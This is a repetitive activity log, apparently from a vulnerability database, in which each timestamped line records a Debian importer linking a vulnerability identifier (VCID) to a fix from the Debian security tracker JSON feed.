2026-04-03T07:27:05.960657+00:00 Debian Importer Fixing VCID-uayc-3r68-tudp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.911748+00:00 Debian Importer Fixing VCID-x65n-6vuk-4ufk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.863757+00:00 Debian Importer Fixing VCID-9n1x-qw25-mbhf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.805176+00:00 Debian Importer Fixing VCID-79w4-fqmh-j3bk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.756261+00:00 Debian Importer Fixing VCID-4633-67u6-akg8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.707269+00:00 Debian Importer Fixing VCID-4urn-ywwt-ayeg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.657659+00:00 Debian Importer Fixing VCID-thbh-m54e-z7ca https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.599770+00:00 Debian Importer Fixing VCID-ra5y-ag3h-5yb8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.551443+00:00 Debian Importer Fixing VCID-bf7n-dsx6-rqa2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.494574+00:00 Debian Importer Fixing VCID-zfw4-5zqw-huh7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.437915+00:00 Debian Importer Fixing VCID-x6sg-6k7v-9qd8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.381329+00:00 Debian Importer Fixing VCID-rf1t-45cj-mue1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.323956+00:00 Debian Importer Fixing VCID-yqzg-rzp1-bbgm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.265970+00:00 Debian Importer Fixing VCID-ngzz-mwp9-rkdv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.217441+00:00 Debian Importer Fixing VCID-f9z9-h8bt-9bg7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.169250+00:00 Debian Importer Fixing VCID-ep6g-44qy-5qd7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.120600+00:00 Debian Importer Fixing VCID-6jnv-nnkm-v7a3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.063251+00:00 Debian Importer Fixing VCID-38vp-3yf8-aue8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:05.005280+00:00 Debian Importer Fixing VCID-5114-9n17-pkd1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.947454+00:00 Debian Importer Fixing VCID-vzru-smr4-5kfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.888605+00:00 Debian Importer Fixing VCID-s4cu-swuc-9fh4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.829738+00:00 Debian Importer Fixing VCID-k7ku-8uya-kbeu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.770752+00:00 Debian Importer Fixing VCID-gq8m-6nq9-4bcq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.712570+00:00 Debian Importer Fixing VCID-3dsm-e7ye-wqe1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.653715+00:00 Debian Importer Fixing VCID-tms4-1k6m-cqgd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.595243+00:00 Debian Importer Fixing VCID-9z34-j85g-9kej https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.537284+00:00 Debian Importer Fixing VCID-fds9-yfxw-gqgs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.478530+00:00 Debian Importer Fixing VCID-gqky-zdxn-e3gd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.420067+00:00 Debian Importer Fixing VCID-2fzg-6h13-s7bk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.360619+00:00 Debian Importer Fixing VCID-2a2h-yk41-qybt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.302613+00:00 Debian Importer Fixing VCID-eeah-xwrp-f3b5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.242775+00:00 Debian Importer Fixing VCID-jxwd-tm1k-yqa2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.193953+00:00 Debian Importer Fixing VCID-zyg9-ad7g-ayex https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.144971+00:00 Debian Importer Fixing VCID-dsee-yrq9-cuca https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.095332+00:00 Debian Importer Fixing VCID-g6sp-5zkq-dkf9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:04.036487+00:00 Debian Importer Fixing VCID-wbx1-wdxc-k3bc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.987376+00:00 Debian Importer Fixing VCID-j1jt-g5m8-ffbh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.938341+00:00 Debian Importer Fixing VCID-2pwb-71f5-8ken https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.889522+00:00 Debian Importer Fixing VCID-xk7c-7f1m-sqe5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.830757+00:00 Debian Importer Fixing VCID-6d5n-tv5h-xkhj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.772032+00:00 Debian Importer Fixing VCID-fx9z-gbbd-q7aq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.722126+00:00 Debian Importer Fixing VCID-6gh6-3g99-x7hz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.663466+00:00 Debian Importer Fixing VCID-fd5j-v9vt-5fbu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.614205+00:00 Debian Importer Fixing VCID-x7us-26aq-3yf8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.565340+00:00 Debian Importer Fixing VCID-v24g-h7t5-nbec https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.507083+00:00 Debian Importer Fixing VCID-1x18-b9sa-yygh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.449466+00:00 Debian Importer Fixing VCID-fbta-m4mx-jfap https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.390750+00:00 Debian Importer Fixing VCID-3fzh-1hk1-3ub1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.332802+00:00 Debian Importer Fixing VCID-4pzm-24uf-73b6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.275020+00:00 Debian Importer Fixing VCID-4dxa-f7vm-7feh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.217003+00:00 Debian Importer Fixing VCID-7vrs-x5dn-sbcm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.159273+00:00 Debian Importer Fixing VCID-6yn4-p8f4-pbh1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.102004+00:00 Debian Importer Fixing VCID-punt-nwt4-uqea https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:03.044572+00:00 Debian Importer Fixing VCID-y3xr-bv9y-mqb5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.986280+00:00 Debian Importer Fixing VCID-kq6x-z56m-wqhh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.927689+00:00 Debian Importer Fixing VCID-w8d2-r2ct-m7gv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.868848+00:00 Debian Importer Fixing VCID-mg1t-vz1h-47b9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.810444+00:00 Debian Importer Fixing VCID-jkdz-rbkr-pygc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.751864+00:00 Debian Importer Fixing VCID-8j37-fwz2-bfea https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.693043+00:00 Debian Importer Fixing VCID-upce-8s7m-2kfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.630753+00:00 Debian Importer Fixing VCID-7eeu-wtkq-dyc1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.572312+00:00 Debian Importer Fixing VCID-zjgp-g783-d3hy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.514700+00:00 Debian Importer Fixing VCID-8jgu-2tx3-gkcb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.456579+00:00 Debian Importer Fixing VCID-e3av-cqc9-dye1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.407750+00:00 Debian Importer Fixing VCID-pthp-wza7-hkgm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.349031+00:00 Debian Importer Fixing VCID-w44j-ecnr-mkhv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.290682+00:00 Debian Importer Fixing VCID-2ea6-uaw4-wba9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.231032+00:00 Debian Importer Fixing VCID-y2nm-f9vb-d7ez https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.171963+00:00 Debian Importer Fixing VCID-yxwd-j8uj-tudx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.114356+00:00 Debian Importer Fixing VCID-vp4y-qhc4-nuat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:02.055676+00:00 Debian Importer Fixing VCID-nzh5-tng5-8qdq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.997237+00:00 Debian Importer Fixing VCID-1gqw-pheb-hfey https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.939025+00:00 Debian Importer Fixing VCID-je5t-8uuq-ekdk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.880821+00:00 Debian Importer Fixing VCID-ps6p-v38m-6qe3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.820838+00:00 Debian Importer Fixing VCID-mt9h-kjh8-kbdu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.760284+00:00 Debian Importer Fixing VCID-t4gn-rwz1-ykcf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.700290+00:00 Debian Importer Fixing VCID-nsfn-bhe3-cbd4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.639545+00:00 Debian Importer Fixing VCID-ee5d-s8eb-tbdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.578587+00:00 Debian Importer Fixing VCID-93em-sxxc-j3ep https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.518411+00:00 Debian Importer Fixing VCID-1daq-9kb7-eudz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.468135+00:00 Debian Importer Fixing VCID-3pky-3t1q-v3av https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.409271+00:00 Debian Importer Fixing VCID-k1pr-h6c7-2fgp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.348242+00:00 Debian Importer Fixing VCID-mws6-wym5-d3f6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.288516+00:00 Debian Importer Fixing VCID-cwez-6cgj-17gz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.209260+00:00 Debian Importer Fixing VCID-fek5-ee6j-yqhv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.159909+00:00 Debian Importer Fixing VCID-jjzy-ch18-qkfp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.102295+00:00 Debian Importer Fixing VCID-w5bd-tn21-fqh7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:01.044890+00:00 Debian Importer Fixing VCID-p5f8-45e4-ybex https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.984326+00:00 Debian Importer Fixing VCID-7dqc-1d5h-uybs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.926154+00:00 Debian Importer Fixing VCID-urv8-ve9y-e3b4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.868130+00:00 Debian Importer Fixing VCID-hcxd-bker-sqc1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.809934+00:00 Debian Importer Fixing VCID-872v-6z75-jucm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.750960+00:00 Debian Importer Fixing VCID-b38j-8u7n-47ga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.701522+00:00 Debian Importer Fixing VCID-rxgw-h3br-b7dy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.641344+00:00 Debian Importer Fixing VCID-wwam-wq1v-1fec https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.591979+00:00 Debian Importer Fixing VCID-2ken-ysm1-2ybw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.533250+00:00 Debian Importer Fixing VCID-7jvc-54zg-pbcz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.473840+00:00 Debian Importer Fixing VCID-3fa4-xqhq-2fdq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.414969+00:00 Debian Importer Fixing VCID-k1v6-jp8s-pye7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.356222+00:00 Debian Importer Fixing VCID-v7m7-26bu-wfer https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.298284+00:00 Debian Importer Fixing VCID-1gh4-vs86-aufs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.239741+00:00 Debian Importer Fixing VCID-1q97-afut-4ffy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.179143+00:00 Debian Importer Fixing VCID-zrtt-8nnj-v3ch https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.121122+00:00 Debian Importer Fixing VCID-d74a-pd2n-6khw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.063819+00:00 Debian Importer Fixing VCID-ekgu-5zg9-2uaa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:00.005838+00:00 Debian Importer Fixing VCID-xgzr-fhu9-myed https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.948418+00:00 Debian Importer Fixing VCID-65b6-jbxy-gudt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.890827+00:00 Debian Importer Fixing VCID-mn7e-8e4j-dqba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.832996+00:00 Debian Importer Fixing VCID-73j4-24p8-pbe5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.774931+00:00 Debian Importer Fixing VCID-5u53-66es-vkbv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.715840+00:00 Debian Importer Fixing VCID-5jx9-7bd4-f3hk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.667791+00:00 Debian Importer Fixing VCID-99f6-k1y9-x7ba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.609196+00:00 Debian Importer Fixing VCID-cuyh-2uau-1yad https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.551328+00:00 Debian Importer Fixing VCID-xtq9-fvcv-kfat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.493499+00:00 Debian Importer Fixing VCID-sat2-d6u2-f3c9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.434879+00:00 Debian Importer Fixing VCID-25zp-duta-2ffk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.376755+00:00 Debian Importer Fixing VCID-5y72-4n85-qyeb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.318519+00:00 Debian Importer Fixing VCID-1nrq-kzuy-vyfx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.260116+00:00 Debian Importer Fixing VCID-xp3x-q8w4-myhb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.203753+00:00 Debian Importer Fixing VCID-jume-bjh7-f3hr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.145594+00:00 Debian Importer Fixing VCID-vguv-n176-k3ch https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.097691+00:00 Debian Importer Fixing VCID-u23c-4px5-c3g9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:59.041083+00:00 Debian Importer Fixing VCID-hry9-mkha-nfct https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.984344+00:00 Debian Importer Fixing VCID-9wbc-9sby-nfbq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.926292+00:00 Debian Importer Fixing VCID-dvvt-ud6y-ffe8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.869925+00:00 Debian Importer Fixing VCID-3136-6rpy-vbep https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.812758+00:00 Debian Importer Fixing VCID-9akb-t56u-4yhr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.753798+00:00 Debian Importer Fixing VCID-sdwh-3s12-17fr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.704935+00:00 Debian Importer Fixing VCID-trt9-1y65-53en https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.646594+00:00 Debian Importer Fixing VCID-s6bw-85wn-jygp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.597032+00:00 Debian Importer Fixing VCID-66d8-ts3a-ybev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.539408+00:00 Debian Importer Fixing VCID-cdsg-3312-zka6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.481078+00:00 Debian Importer Fixing VCID-txgd-58rj-73a3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.422814+00:00 Debian Importer Fixing VCID-qye1-pv1p-8fbp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.374152+00:00 Debian Importer Fixing VCID-b3ps-gf9j-vubp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.314862+00:00 Debian Importer Fixing VCID-23ws-9cmr-jffa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.244919+00:00 Debian Importer Fixing VCID-dr7r-hah7-vfdv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.184356+00:00 Debian Importer Fixing VCID-ckma-a7b3-k3aw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.123996+00:00 Debian Importer Fixing VCID-5gug-qb5f-rkae https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.064715+00:00 Debian Importer Fixing VCID-px2h-8ag6-s3ec https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:58.005982+00:00 Debian Importer Fixing VCID-72e3-s3pn-gbe5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.948087+00:00 Debian Importer Fixing VCID-33k9-ygup-9fb3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.889998+00:00 Debian Importer Fixing VCID-32qk-mugj-73h4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.831571+00:00 Debian Importer Fixing VCID-khv9-9he8-ykbf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.771803+00:00 Debian Importer Fixing VCID-huhv-jxyu-jygx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.713560+00:00 Debian Importer Fixing VCID-dqjz-99u6-uyh3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.656025+00:00 Debian Importer Fixing VCID-jhk3-xpvd-xbfj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.598219+00:00 Debian Importer Fixing VCID-pnpw-8utk-uua7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.540366+00:00 Debian Importer Fixing VCID-qkwb-2fep-gba7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.484017+00:00 Debian Importer Fixing VCID-gdy9-dhzs-aqh9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.426174+00:00 Debian Importer Fixing VCID-8zt8-za5g-s7e6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.366008+00:00 Debian Importer Fixing VCID-sj8x-sdpv-rkfy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.307042+00:00 Debian Importer Fixing VCID-75nc-a6rr-g3f6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.250165+00:00 Debian Importer Fixing VCID-1r3u-6afm-23f2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.192140+00:00 Debian Importer Fixing VCID-hgfv-dtsx-hbdx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.133365+00:00 Debian Importer Fixing VCID-mpqt-5tap-57g1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.075118+00:00 Debian Importer Fixing VCID-j559-5amz-4qff https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:57.016621+00:00 Debian Importer Fixing VCID-w1s1-4kv8-5bca https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.957497+00:00 Debian Importer Fixing VCID-ghqa-k8ma-tfcs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.898450+00:00 Debian Importer Fixing VCID-xd3u-trsv-fbd3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.839625+00:00 Debian Importer Fixing VCID-fafu-jmw4-dqd9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.781987+00:00 Debian Importer Fixing VCID-jbt4-qpnp-yqdm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.723804+00:00 Debian Importer Fixing VCID-hc1j-dabv-pyge https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.666458+00:00 Debian Importer Fixing VCID-6e1q-75mk-pygm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.607743+00:00 Debian Importer Fixing VCID-p2zf-ypkv-g7ay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.548474+00:00 Debian Importer Fixing VCID-c3ut-nv6u-efbj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.489692+00:00 Debian Importer Fixing VCID-fduk-nxtd-uya3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.432623+00:00 Debian Importer Fixing VCID-krca-sq7c-gfbg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.374699+00:00 Debian Importer Fixing VCID-bpqt-4zxx-fkd4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.315656+00:00 Debian Importer Fixing VCID-7cbm-nm6u-8kdp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.266324+00:00 Debian Importer Fixing VCID-h78w-2n4r-8qfh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.207662+00:00 Debian Importer Fixing VCID-3uv5-g9f4-kyg2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.147695+00:00 Debian Importer Fixing VCID-w289-j445-xka7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.087578+00:00 Debian Importer Fixing VCID-pyd8-6ykz-yka7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:56.027208+00:00 Debian Importer Fixing VCID-b6c2-jyre-ykg9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.968419+00:00 Debian Importer Fixing VCID-2uq7-pcfv-d7hv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.910457+00:00 Debian Importer Fixing VCID-m9fk-3upg-33eu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.852419+00:00 Debian Importer Fixing VCID-74ak-g3rw-xygd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.793801+00:00 Debian Importer Fixing VCID-7wrg-6pw1-nucx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.743219+00:00 Debian Importer Fixing VCID-7fmu-6e6q-r7hd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.683719+00:00 Debian Importer Fixing VCID-5r21-bc2f-9fha https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.624184+00:00 Debian Importer Fixing VCID-mv9q-facp-yub3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.564878+00:00 Debian Importer Fixing VCID-2tv8-3fz3-3yfy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.505767+00:00 Debian Importer Fixing VCID-aars-axy1-4yd6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.446693+00:00 Debian Importer Fixing VCID-c9cz-ebdv-t7eq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.397318+00:00 Debian Importer Fixing VCID-8fa4-9jsh-3bh9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.347762+00:00 Debian Importer Fixing VCID-wk4h-a1su-wfbh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.298096+00:00 Debian Importer Fixing VCID-4nsq-h8ab-5kcj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.248536+00:00 Debian Importer Fixing VCID-1223-kpm6-2fh6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.198726+00:00 Debian Importer Fixing VCID-qu7p-k327-6uht https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.140397+00:00 Debian Importer Fixing VCID-gaat-4369-hug5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.082485+00:00 Debian Importer Fixing VCID-z3q2-pgdm-wfbz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:55.025809+00:00 Debian Importer Fixing VCID-fykb-qjuw-3qcj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.969283+00:00 Debian Importer Fixing VCID-884z-9tnu-kfa5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.909677+00:00 Debian Importer Fixing VCID-g49y-ec8g-f7h4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.851319+00:00 Debian Importer Fixing VCID-3pw2-zq6a-2khx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.792896+00:00 Debian Importer Fixing VCID-4s1v-yhef-uqfx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.734587+00:00 Debian Importer Fixing VCID-5efq-7fxc-zyet https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.677355+00:00 Debian Importer Fixing VCID-eg3d-khb6-rfh1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.618859+00:00 Debian Importer Fixing VCID-47zb-362f-n3b8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.560188+00:00 Debian Importer Fixing VCID-ybyx-4c24-aqb8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.501665+00:00 Debian Importer Fixing VCID-vbqu-m52z-4qfg https://security-tracker.debian.org/tracker/data/json 38.1.0
